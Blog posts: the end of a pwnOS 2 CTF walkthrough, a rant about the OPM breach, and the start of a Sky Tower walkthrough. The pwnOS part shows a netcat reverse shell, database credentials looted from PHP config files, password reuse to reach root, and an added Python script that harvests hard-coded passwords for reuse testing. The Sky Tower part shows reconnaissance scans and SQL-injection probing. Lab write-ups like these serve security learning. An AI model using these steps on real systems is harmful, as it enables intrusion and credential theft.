<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT88ujj_-Vwn9fUlUXOySB7I2TJrDo_EXUVLL6GRU5EFOq_l2tcfsDVikcmUCYUx_1jLVA615zGr2dssIHadFC1wXg6nexYf_wr1aI4KfWpJybzB_NBqCLTEJvFsnlqknXnwP6gR1lKYM/s1600/Screenshot+from+2015-07-05+10%253A42%253A18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT88ujj_-Vwn9fUlUXOySB7I2TJrDo_EXUVLL6GRU5EFOq_l2tcfsDVikcmUCYUx_1jLVA615zGr2dssIHadFC1wXg6nexYf_wr1aI4KfWpJybzB_NBqCLTEJvFsnlqknXnwP6gR1lKYM/s400/Screenshot+from+2015-07-05+10%253A42%253A18.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Having no job control in this shell, I used the installed Python interpreter to spawn a proper pty and get an improved shell. I then looked around the /var/www directory for interesting giveaways in the files.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
<pre>
root@kali:~/pwnos2# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.10.10.5] from (UNKNOWN) [10.10.10.100] 36792
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 01:57:41 up  3:34,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off

$ /bin/bash -i
bash: no job control in this shell
www-data@web:/var/www$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php
www-data@web:/var/www$ more
</pre>
<br /><br /><br />
<br />
</td>
</tr>
</tbody></table>
<br />The file named mysqli_connect.php had MySQL database credentials in it.<br /><br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjdYrdEBebw5QtltMX8b4bUvjp6yffTxyKpO_sTMaAOQU4hbJuebbwz5Ni7WM_yLkQpnIeBH-VAwlPKtnCS23QQ0aS96DNIkJdFifAFGx77Yl16hRPDtn-bPeonV8FNiT8eHPdRgjJjri/s1600/Screenshot+from+2015-07-05+11%253A23%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjdYrdEBebw5QtltMX8b4bUvjp6yffTxyKpO_sTMaAOQU4hbJuebbwz5Ni7WM_yLkQpnIeBH-VAwlPKtnCS23QQ0aS96DNIkJdFifAFGx77Yl16hRPDtn-bPeonV8FNiT8eHPdRgjJjri/s400/Screenshot+from+2015-07-05+11%253A23%253A42.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
DEFINE ('DB_USER', 'root');<br />
DEFINE ('DB_PASSWORD', 'goodday');<br />
DEFINE ('DB_HOST', 'localhost');<br />
DEFINE ('DB_NAME', 'ch16');</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We all know about the likelihood of password reuse, so I tried what I found both inside and outside the database. Unfortunately it didn't work out for me. I spent several hours running local privilege escalation exploits, Linux privilege escalation check scripts, etc., until I stumbled across a separate file also named mysqli_connect.php located in the /var directory. This file had different credentials, which worked for the MySQL instance. I decided to pillage the DB a bit.</div>
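Finding the second mysqli_connect.php by hand took hours, so here is an added example (mine, not from the post) that does the looting step mechanically in Python: walk a tree, pull define()/DEFINE() string constants out of .php files, keep the files that define a secret-looking constant, and list the distinct passwords so each can be tried against MySQL, SSH and su. The two config files it scans are constructed copies of the ones shown above, written to a temporary directory that mirrors /var as root/ and /var/www as root/www/; the extra index.php is there only to show that a non-secret define() is ignored.

```python
"""Hunt for hard-coded DB credentials in PHP config files and list them for reuse testing.

Added example, not part of the walkthrough; the scanned files are constructed here.
"""
import os
import re
import tempfile
from typing import Dict, List

# Constructed copy of /var/www/mysqli_connect.php as the walkthrough shows it.
WWW_CONFIG = """<?php
// stand-in for /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
"""
# Constructed copy of /var/mysqli_connect.php: same file, different password.
VAR_CONFIG = WWW_CONFIG.replace("/var/www/", "/var/").replace("'goodday'", "'root@ISIntS'")
# A define() that is not a secret, to show such files are skipped.
INDEX_PHP = "<?php define('SITE_TITLE', 'Welcome to this Site!'); ?>\n"

# Matches DEFINE ('DB_USER', 'root'); and define("DB_PASSWORD", "x"); values may not contain quotes.
_DEFINE = re.compile(
    r"""define\s*\(\s*['"](?P<name>[A-Za-z0-9_]+)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)
_SECRET_HINTS = ("PASS", "PWD", "SECRET", "TOKEN", "KEY")


def is_secret_name(const: str) -> bool:
    """Heuristic: constant names that usually hold credentials."""
    return any(h in const.upper() for h in _SECRET_HINTS)


def php_constants(path: str) -> Dict[str, str]:
    """All define()/DEFINE() string constants in one file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return {m.group("name"): m.group("value") for m in _DEFINE.finditer(fh.read())}


def find_credentials(root: str) -> Dict[str, Dict[str, str]]:
    """{path relative to root: constants} for every .php file defining a secret-looking constant."""
    hits: Dict[str, Dict[str, str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            consts = php_constants(full)
            if any(is_secret_name(k) for k in consts):
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = consts
    return hits


def distinct_passwords(hits: Dict[str, Dict[str, str]]) -> List[str]:
    """Unique secret values across all hits: the list to try for reuse on other services."""
    seen: List[str] = []
    for consts in hits.values():
        for k, v in consts.items():
            if is_secret_name(k) and v and v not in seen:
                seen.append(v)
    return seen


def build_sample_tree() -> str:
    """Write the constructed files to a temp dir laid out like /var (root) and /var/www (root/www)."""
    root = tempfile.mkdtemp(prefix="pwnos2_")
    os.makedirs(os.path.join(root, "www"))
    for rel, body in (("mysqli_connect.php", VAR_CONFIG),
                      ("www/mysqli_connect.php", WWW_CONFIG),
                      ("www/index.php", INDEX_PHP)):
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    found = find_credentials(build_sample_tree())
    for path, consts in found.items():
        print(path, {k: v for k, v in consts.items() if is_secret_name(k)})
    print("passwords to try for reuse:", distinct_passwords(found))
```

On a real box point `find_credentials` at /var (or /) instead of the temp tree; the point of `distinct_passwords` is that every value it returns gets tried against `mysql -u root -p`, `su`, and SSH for each local user, which is exactly the reuse that opened this machine.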
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
<pre>
cat mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var$ 



www-data@web:/var$ mysql -u root
mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
www-data@web:/var$ mysql -u root -proot@ISIntS
mysql -u root -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1113
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql> 
</pre>
<br />
</td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The db contents could have proven helpful in my conquest, but I gave the credentials a go on the system and boom, good ol' password reuse strikes again.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLetXvnqA2JLhoO_0IDQiz5R6IXKRPN59vjuKAgpSMZp3cKpC9HTv17r4CIWQRxQqueluNKELCcZ-2qoen18VyyF79m6IamJmHV19QYdTNsBYolv2pDZvOGyCBLiTqe4eb6TG1R95T85cf/s1600/Screenshot+from+2015-07-05+14%253A06%253A02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLetXvnqA2JLhoO_0IDQiz5R6IXKRPN59vjuKAgpSMZp3cKpC9HTv17r4CIWQRxQqueluNKELCcZ-2qoen18VyyF79m6IamJmHV19QYdTNsBYolv2pDZvOGyCBLiTqe4eb6TG1R95T85cf/s400/Screenshot+from+2015-07-05+14%253A06%253A02.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Woot, Woot!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I enjoyed this VM a lot, thanks to the guys at http://www.pwnos.com/. I'll keep my eyes open for a Version 3.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
</div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-42661588720782494852015-06-06T20:01:00.000-04:002015-06-08T10:33:15.606-04:00Post OPM Breach Rant<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<br /></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Like
the majority of cyber security professionals in the world, I can't
help but reflect on the recent major breach of US government
personnel files from the <span style="font-size: small;">Office
of Personnel Management.</span></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAL17wXaVuw2-w5lfd16nd41Rmew3y5fNA9OhY8BbUEX_-pttvAQdJ5Il_Mgq6jHRsI9J0zDlKVtxqlYPWBSapSZJEAG02Hsr0kAzCv-_B_vELycJa4mlUVuP6K3E3MP5_-ChlUd9-7Ef/s1600/OPM_logo_insert.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAL17wXaVuw2-w5lfd16nd41Rmew3y5fNA9OhY8BbUEX_-pttvAQdJ5Il_Mgq6jHRsI9J0zDlKVtxqlYPWBSapSZJEAG02Hsr0kAzCv-_B_vELycJa4mlUVuP6K3E3MP5_-ChlUd9-7Ef/s320/OPM_logo_insert.jpg" width="320" /></a></span></span></span></div>
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;"> </span></span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;">While
the government has made strides towards unifying the security
postures across agencies, with efforts like the DHS Trusted Internet
Connection initiative, as well as advanced technical solutions like
the </span><span style="font-size: small;">EINSTEIN 3
Intrusion Detection System, I feel that a more fundamental form of
remediation is necessary.</span></span></span></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Security
can be compromised by ambiguities and shortcomings in the guiding
standards. A recent <a href="http://www.gao.gov/products/GAO-13-776">GAO
finding pertinent to reports of FISMA compliance</a> associated with
use of the previous version of SP 800-53 indicated disconnects
between FISMA compliance reports and agencies' actual security
posture (<i>M.E Kabay 2009 – <a href="http://www.networkworld.com/article/2252453/compliance/sp-800-53-is-essential-for-security-in-federal-government-it-systems.html">NIST
800-53 is essential in federal government IT systems</a></i>). I'm
here to say that this ambiguity still persists in SP 800-53, Revision
4. </span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">We
(our government's Infosec leaders) need to rework information
security strategy from the ground up, by creating a clear standard
which allows our numerous agencies to elevate their security postures
rather than creatively word-smithing their existing procedures around
unclear security controls. Although not perfect, commercial standards
such as the Payment Card Industry Standard (PCI-DSS version 3.1) have
addressed this issue well. The end result of a PCI assessment
generally leaves the subject knowing 3 things: we have this control
in place, or we do not have this control in place, and finally
we'll have to implement X to become compliant. </span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Of
course there are always multiple technical shortcomings that factor
into breaches of this magnitude; however, ultimate remediation starts
from the bottom of the stack. The integration of commercial products
and personnel, in the form of government contractors, has long been
a strategy embraced by the federal government. This approach has not
been applied in the development of 800-53, or at least not done well.
Not to totally discredit the standard: it was definitely a forerunner
of the majority of regulatory compliance standards, and implemented
correctly it addresses the vast majority of all security risks. However,
I do feel that in this case less may be more. Collectively the NIST
standard is comprised of over 950 individual controls, turning
something that actually isn't rocket science into an exercise that
I'd rather build a rocket than perform. </span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyiJlTWaSaZ2XoLq8lGcTfMqgng7_DULIe0rGtGEb-OvPlc7hSUtb11O3yw8KlVWOGf-d2GMA0o-3RlvDcozZIlB3AMocM5SLfWccvWZCSbhA4fjlTqXFC0LuGt2ccfTtFjST5hHsS5Uk/s1600/not_rocket_science.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyiJlTWaSaZ2XoLq8lGcTfMqgng7_DULIe0rGtGEb-OvPlc7hSUtb11O3yw8KlVWOGf-d2GMA0o-3RlvDcozZIlB3AMocM5SLfWccvWZCSbhA4fjlTqXFC0LuGt2ccfTtFjST5hHsS5Uk/s320/not_rocket_science.png" width="320" /></a></span></span></div>
<br />
<div align="left" style="border: none; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="line-height: 160%;">Removing
some of the complexity and red tape which is not aligned to true
risk will allow agencies and commercial organizations alike to
concentrate on the basic shortcomings that cyber criminals target and successfully compromise again, and again....</span></span></span></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<br /></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com4tag:blogger.com,1999:blog-4508217951330976703.post-82150115338712562442015-05-30T16:41:00.000-04:002015-06-05T22:40:04.527-04:00The Sky Tower Vulnerable VM Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<div style="text-align: left;">
<span style="line-height: 100%;">I recently took on
the challenge to hack the Sky Tower Vulnerable</span><span style="font-family: Liberation Serif, serif; line-height: 100%;"><span style="font-size: 12pt;">
VM. </span></span><span style="line-height: 100%;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: 12pt;">This
CTF was designed by <a href="https://www.telspace.co.za/" target="_blank">Telspace Systems</a> for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town).
The aim is to test intermediate to advanced security enthusiasts in
their ability to attack a system using a multi-faceted approach and
obtain the "flag".</span></span></span></span></div>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">As
usual this VM is hosted by the good folks at <a href="http://vulnhub.com/">vulnhub.com</a> with a ton
of other challenges. Here's the approach that I took to gain root
level access to the box:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><b>Enumeration</b></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">
</span></span></span></span></span></span>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# nmap -A 10.1.1.7<br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT<br />
Nmap scan report for 10.1.1.7<br />
Host is up (0.00084s latency).<br />
Not shown: 997 closed ports<br />
PORT     STATE    SERVICE    VERSION<br />
<b>22/tcp   filtered ssh</b><br />
<b>80/tcp   open     http       Apache httpd 2.2.22 ((Debian))</b><br />
|_http-title: Site doesn't have a title (text/html).<br />
<b>3128/tcp open     http-proxy Squid http proxy 3.1.20</b><br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)<br />
|_http-title: ERROR: The requested URL could not be retrieved<br />
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)<br />
Device type: general purpose<br />
Running: Linux 3.X<br />
OS CPE: cpe:/o:linux:linux_kernel:3<br />
OS details: Linux 3.2 - 3.10<br />
Network Distance: 1 hop<br />
<br />
TRACEROUTE<br />
HOP RTT     ADDRESS<br />
1   0.85 ms 10.1.1.7<br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
The quick glance
shows a filtered SSH service, possible website on port 80, and a
Squid http proxy. Needing more information, I fired up Nikto and
Dirbuster.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# nikto -h 10.1.1.7<br />
- Nikto v2.1.6<br />
---------------------------------------------------------------------------<br />
+ Target IP:          10.1.1.7<br />
+ Target Hostname:    10.1.1.7<br />
+ Target Port:        80<br />
+ Start Time:         2015-05-28 21:23:39 (GMT-4)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/2.2.22 (Debian)<br />
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014<br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ Uncommon header 'tcn' found, with contents: list<br />
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html<br />
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.<br />
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD <br />
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
<b>+ /login.php: Admin login page/section found</b>.<br />
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host<br />
+ End Time:           2015-05-28 21:24:01 (GMT-4) (22 seconds)<br />
---------------------------------------------------------------------------<br />
+ 1 host(s) tested<br />
root@kali:~# dirb http://10.1.1.7<br />
<br />
-----------------<br />
DIRB v2.21 <br />
By The Dark Raver<br />
-----------------<br />
<br />
START_TIME: Thu May 28 21:25:56 2015<br />
URL_BASE: http://10.1.1.7/<br />
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt<br />
<br />
-----------------<br />
<br />
GENERATED WORDS: 4592 <br />
<br />
---- Scanning URL: http://10.1.1.7/ ----<br />
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)<br />
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)<br />
+ http://10.1.1.7/index (CODE:200|SIZE:1136)<br />
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)<br />
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)<br />
<br />
-----------------<br />
DOWNLOADED: 4592 - FOUND: 5</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Ok,
looking at these results, I see an outdated version of Apache
running, a login.php page which warrants a closer look, and several pages
identified by Dirbuster which require investigation.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
First let's take a
look at the login.php page. We find a typical form-based page which
may be susceptible to SQL injection:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietUimv9oZxLnEwiF3JFvb-U978Mzi9DsGX8UYIE2YI73zYjgr9GrjdA8JEbqBFxEREa8qsJs0GXsiwSbEH3P26IZ2U46Hwm1GARmEVzkcVKUakgb3udxYdpxypvYtRqjfMObUAFTyriU1/s1600/Screenshot+from+2015-05-28+21%253A00%253A09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietUimv9oZxLnEwiF3JFvb-U978Mzi9DsGX8UYIE2YI73zYjgr9GrjdA8JEbqBFxEREa8qsJs0GXsiwSbEH3P26IZ2U46Hwm1GARmEVzkcVKUakgb3udxYdpxypvYtRqjfMObUAFTyriU1/s400/Screenshot+from+2015-05-28+21%253A00%253A09.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Using basic single
quote techniques and such, I'm able to get the system to generate an
overly verbose message revealing the underlying database type:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iFMZ_esrsAToAvXO4nTqmK_5ZMlO9YdAPPrgLGaLNtCD9EKFNDkxf31YDk1Q6b6DcBEQCCdnNrOFOKoC0iScbydN-ml_EIfvuKTsuUp8buLg2RWuqsWP4Nc7L-8R_CqhhAU3IUyUTw7C/s1600/Screenshot+from+2015-05-28+21%253A08%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iFMZ_esrsAToAvXO4nTqmK_5ZMlO9YdAPPrgLGaLNtCD9EKFNDkxf31YDk1Q6b6DcBEQCCdnNrOFOKoC0iScbydN-ml_EIfvuKTsuUp8buLg2RWuqsWP4Nc7L-8R_CqhhAU3IUyUTw7C/s400/Screenshot+from+2015-05-28+21%253A08%253A40.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Curious, and wanting
to justify advancing down the SQLi path, I ran Uniscan to verify the
injection point:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# uniscan -u http://10.1.1.7/login.php -d<br />
####################################<br />
# Uniscan project                  #<br />
# http://uniscan.sourceforge.net/  #<br />
####################################<br />
V. 6.2<br />
<br />
<br />
Scan date: 28-5-2015 22:0:26<br />
=============================================<br />
| Domain: http://10.1.1.7/login.php/<br />
| Server: Apache/2.2.22 (Debian)<br />
| IP: 10.1.1.7<br />
=============================================<br />
|<br />
| Crawler Started:<br />
| Plugin name: FCKeditor upload test v.1 Loaded.<br />
| Plugin name: E-mail Detection v.1.1 Loaded.<br />
| Plugin name: External Host Detect v.1.2 Loaded.<br />
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.<br />
| Plugin name: Upload Form Detect v.1.1 Loaded.<br />
| Plugin name: Code Disclosure v.1.1 Loaded.<br />
| Plugin name: phpinfo() Disclosure v.1 Loaded.<br />
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.<br />
| [+] Crawling finished, 0 URL's found!<br />
|<br />
| FCKeditor File Upload:<br />
|<br />
| E-mails:<br />
|<br />
| External hosts:<br />
|<br />
| Web Backdoors:<br />
|<br />
| File Upload Forms:<br />
|<br />
| Source Code Disclosure:<br />
|<br />
| PHPinfo() Disclosure:<br />
|<br />
| Timthumb:<br />
